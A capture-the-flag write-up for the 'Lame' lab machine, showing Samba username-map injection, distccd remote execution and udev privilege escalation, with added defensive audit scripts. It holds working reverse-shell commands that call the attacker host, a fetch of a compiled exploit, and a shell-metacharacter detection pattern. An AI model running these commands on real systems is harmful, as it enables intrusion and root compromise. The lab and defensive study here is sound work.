Lame

Authenticated SMB Reverse shell - Distccd v1 exploitation - Kernel 2.6 udev PrivEsc

Scanning

FTP Enumeration

Not vulnerable!

SMB Enumeration & Exploitation

WRITE access is enabled!

We can get a shell with the following command, but only if we are an authenticated user!

logon "/=`nohup nc -nv 10.10.14.6 4444 -e /bin/sh`"
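The logon trick above works because the server hands the supplied username to a shell through Samba's "username map script" setting (CVE-2007-2447). The following audit is an added example written for this page, not code from the original writeup or from the Samba project: it checks a Samba version banner against the affected range (3.0.20 up to and including the 3.0.25 release candidates), looks for the "username map script" directive in smb.conf text, and flags logon records whose username carries shell metacharacters. The banner, smb.conf snippet, script path and key=value log lines are constructed samples, not a real Samba log format.

```python
"""Audit for the Samba 'username map script' command injection (CVE-2007-2447),
the weakness behind the backtick-in-username logon above.
Added example, not part of the original writeup; sample config and log records
are constructed."""
import re
from typing import Dict, List, Optional, Tuple

# Affected releases: 3.0.20 up to and including the 3.0.25 release candidates;
# 3.0.25 final carries the fix.
AFFECTED_FROM = (3, 0, 20)
FIXED_IN = (3, 0, 25)

# Characters that let a username break out of the shell command the map script is run with.
SHELL_META = re.compile(r"[`$;|&<>\n]")


def parse_samba_version(banner: str) -> Optional[Tuple[Tuple[int, int, int], bool]]:
    """Pull (major, minor, patch) and an is-release-candidate flag out of text such as
    'Samba 3.0.20-Debian' or 'Version 3.0.25rc3'. Returns None when no version is present."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)(rc\d+)?", banner)
    if not m:
        return None
    core = (int(m.group(1)), int(m.group(2)), int(m.group(3)))
    return core, m.group(4) is not None


def samba_version_affected(banner: str) -> bool:
    parsed = parse_samba_version(banner)
    if parsed is None:
        return False
    core, is_rc = parsed
    if AFFECTED_FROM <= core < FIXED_IN:
        return True
    return core == FIXED_IN and is_rc  # 3.0.25rc1..rc3 are still vulnerable


def username_map_script(smb_conf: str) -> Optional[str]:
    """Return the 'username map script' value from smb.conf text, or None if unset.
    Samba parameter names are case-insensitive and ignore internal spaces."""
    for raw in smb_conf.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;[" or "=" not in line:
            continue
        key, value = line.split("=", 1)
        if key.replace(" ", "").lower() == "usernamemapscript" and value.strip():
            return value.strip()
    return None


def suspicious_usernames(records: List[str]) -> List[str]:
    """Return usernames from logon records that carry shell metacharacters.
    Records use a constructed key=value layout, not a real Samba log format."""
    hits = []
    for rec in records:
        m = re.search(r'user="([^"]*)"', rec)
        if m and SHELL_META.search(m.group(1)):
            hits.append(m.group(1))
    return hits


def audit(banner: str, smb_conf: str, records: List[str]) -> Dict[str, object]:
    """Combine the three checks. 'exploitable' needs both an affected build and the
    map-script directive enabled; the logon hits are the detection side."""
    affected = samba_version_affected(banner)
    script = username_map_script(smb_conf)
    return {
        "version_affected": affected,
        "map_script": script,
        "exploitable": affected and script is not None,
        "suspicious_logons": suspicious_usernames(records),
    }


SAMPLE_BANNER = "Samba 3.0.20-Debian"  # constructed
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   ; hands the supplied username to an external script via the shell
   username map script = /usr/local/bin/mapusers.sh
"""  # constructed; the script path is a placeholder
SAMPLE_RECORDS = [  # constructed
    'ts=2024-05-01T10:00:01Z src=192.0.2.10 user="alice" result=ok',
    'ts=2024-05-01T10:00:07Z src=192.0.2.77 user="/=`id`" result=fail',
    'ts=2024-05-01T10:00:09Z src=192.0.2.77 user="bob;id" result=fail',
]

if __name__ == "__main__":
    print(audit(SAMPLE_BANNER, SAMPLE_SMB_CONF, SAMPLE_RECORDS))
```

Removing the "username map script" directive (or upgrading past 3.0.25rc3) closes the hole; the username check is the detection side, since a legitimate account name never needs a backtick, `;` or `|`.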

Alternative Method

Distcc v1 is vulnerable!

nmap -p 3632 10.10.10.3 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.6 4444 -e /bin/bash'"

We can start a listener!

nc -nlvp 4444
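The nmap script above reports whether distccd will compile (and therefore execute) whatever an unauthenticated client sends (CVE-2004-2687). That exposure depends on how the daemon was started: it is only reachable when distccd accepts jobs from any host. The following check is an added example for this page, not code from the original writeup or from the distcc project; it parses a distccd command line for `--allow` networks and a `--listen` address and reports whether the service is open to anyone who can reach the port. The command lines are constructed samples.

```python
"""Check whether a distccd command line limits which clients may submit jobs.
CVE-2004-2687 is reachable only when the daemon accepts jobs from any host.
Added example, not part of the original writeup; sample command lines are constructed."""
import ipaddress
import shlex
from typing import Dict, List, Optional


def _option_values(args: List[str], name: str) -> List[str]:
    """Collect values given as '--name VALUE' or '--name=VALUE'."""
    values = []
    i = 0
    while i < len(args):
        if args[i] == name and i + 1 < len(args):
            values.append(args[i + 1])
            i += 2
            continue
        if args[i].startswith(name + "="):
            values.append(args[i].split("=", 1)[1])
        i += 1
    return values


def allowed_networks(cmdline: str) -> list:
    """Every --allow network the daemon was started with (empty list = no restriction)."""
    return [ipaddress.ip_network(v, strict=False)
            for v in _option_values(shlex.split(cmdline), "--allow")]


def listen_address(cmdline: str) -> Optional[str]:
    """The last --listen address, or None when the daemon binds every interface."""
    values = _option_values(shlex.split(cmdline), "--listen")
    return values[-1] if values else None


def is_unrestricted(cmdline: str) -> bool:
    """True when any host that can reach the port may submit jobs: no --allow at all,
    or an --allow covering the whole address space, and not bound to loopback."""
    listen = listen_address(cmdline)
    if listen is not None and ipaddress.ip_address(listen).is_loopback:
        return False
    nets = allowed_networks(cmdline)
    if not nets:
        return True
    return any(n.prefixlen == 0 for n in nets)


def audit(cmdlines: Dict[str, str]) -> Dict[str, bool]:
    """Map each labelled command line to whether it is unrestricted."""
    return {label: is_unrestricted(c) for label, c in cmdlines.items()}


SAMPLE_CMDLINES = {  # constructed
    "no-allow": "/usr/bin/distccd --daemon --user distccd --port 3632",
    "wildcard": "/usr/bin/distccd --daemon --allow 0.0.0.0/0",
    "lan-only": "/usr/bin/distccd --daemon --allow 192.0.2.0/24 --allow=198.51.100.0/24",
    "loopback": "/usr/bin/distccd --daemon --listen 127.0.0.1",
}

if __name__ == "__main__":
    for label, open_to_all in audit(SAMPLE_CMDLINES).items():
        print(f"{label}: {'UNRESTRICTED' if open_to_all else 'restricted'}")
```

On a live host the command line comes from `ps` or `/proc/<pid>/cmdline`; the fix is an `--allow` list limited to the build clients, or binding the daemon to loopback if only local jobs are expected.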

Privilege Escalation

We’ll need to escalate privileges. Google the OS version, Linux 2.6.24, to see whether it is vulnerable to any known exploits. I tried CVE-2016-5195 and CVE-2008-0600, but they didn’t work.

Let’s try CVE-2009-1185:

searchsploit -m 8572.c
gcc 8572.c -o 8572
python -m SimpleHTTPServer 9005    # serve the compiled exploit from the attacking machine
wget http://10.10.14.6:9005/8572    # fetch it on the target; the port must match the server above

To run it, we need to do two things:

  • Figure out the PID of the udevd netlink socket

  • Create a run file in /tmp and add a reverse shell to it. Since any payload in that file will run as root, we’ll get a privileged reverse shell

ps aux | grep devd

Start the listener and run the exploit with the PID.
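The three local CVEs tried in this section each apply only to a bounded version range: CVE-2008-0600 (vmsplice) to kernels 2.6.17 up to 2.6.24.1, CVE-2016-5195 (Dirty COW) to 2.6.22 up to 4.8.2, and CVE-2009-1185 to udev releases before 141. The triage script below is an added example for this page, not code from the original writeup: given `uname -r` and `udevadm --version` style output, it reports which of the three are applicable by version. A hit means "check patch status", not "exploitable": distributions and stable kernel branches backport fixes without changing the version string, and the page itself shows two version-applicable exploits failing. The fixed-version boundaries are first mainline fixes; the sample inputs are constructed.

```python
"""Triage which of the three local-privilege-escalation CVEs tried above apply
to a host by version, from 'uname -r' and 'udevadm --version' output.
Version applicability is necessary, not sufficient: backported fixes do not
change the version string. Added example, not part of the original writeup."""
import re
from typing import Dict, List, Optional, Tuple

# (cve, first affected release, first mainline release with the fix)
KERNEL_CVES = [
    ("CVE-2008-0600", (2, 6, 17), (2, 6, 24, 2)),  # vmsplice
    ("CVE-2016-5195", (2, 6, 22), (4, 8, 3)),      # Dirty COW
]
UDEV_FIXED = 141  # udev 141 started checking that netlink messages come from the kernel (CVE-2009-1185)


def parse_kernel(release: str) -> Tuple[int, ...]:
    """'2.6.24-16-server' -> (2, 6, 24); '2.6.24.2-custom' -> (2, 6, 24, 2)."""
    m = re.match(r"(\d+(?:\.\d+)+)", release.strip())
    if not m:
        raise ValueError(f"no kernel version in {release!r}")
    return tuple(int(x) for x in m.group(1).split("."))


def kernel_in_range(version: Tuple[int, ...], first: Tuple[int, ...], fixed: Tuple[int, ...]) -> bool:
    """Tuple comparison handles a shorter version naturally: (2,6,24) < (2,6,24,2)."""
    return first <= version < fixed


def udev_version(text: str) -> Optional[int]:
    """'udevadm --version' prints a bare number; older 'udevinfo -V' prints
    'udevinfo, version 117'. Take the last number either way."""
    nums = re.findall(r"\d+", text)
    return int(nums[-1]) if nums else None


def triage(kernel_release: str, udev_text: str) -> Dict[str, bool]:
    """Map each CVE to whether the reported versions fall inside its affected range."""
    kv = parse_kernel(kernel_release)
    result = {cve: kernel_in_range(kv, first, fixed) for cve, first, fixed in KERNEL_CVES}
    uv = udev_version(udev_text)
    result["CVE-2009-1185"] = uv is not None and uv < UDEV_FIXED
    return result


def needs_patch_review(kernel_release: str, udev_text: str) -> List[str]:
    """CVE ids whose version range matches; confirm each against the distro's patch status."""
    return [cve for cve, hit in triage(kernel_release, udev_text).items() if hit]


SAMPLE_KERNEL = "2.6.24-16-server"  # constructed, uname -r style
SAMPLE_UDEV = "udevinfo, version 117"  # constructed, udevinfo -V style

if __name__ == "__main__":
    for cve, hit in triage(SAMPLE_KERNEL, SAMPLE_UDEV).items():
        print(f"{cve}: {'version in affected range' if hit else 'not applicable by version'}")
```

For the sample host all three ranges match, which is consistent with the page: the version check says to look at all three, and only a test (or the distribution's changelog) tells which fix is actually missing.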
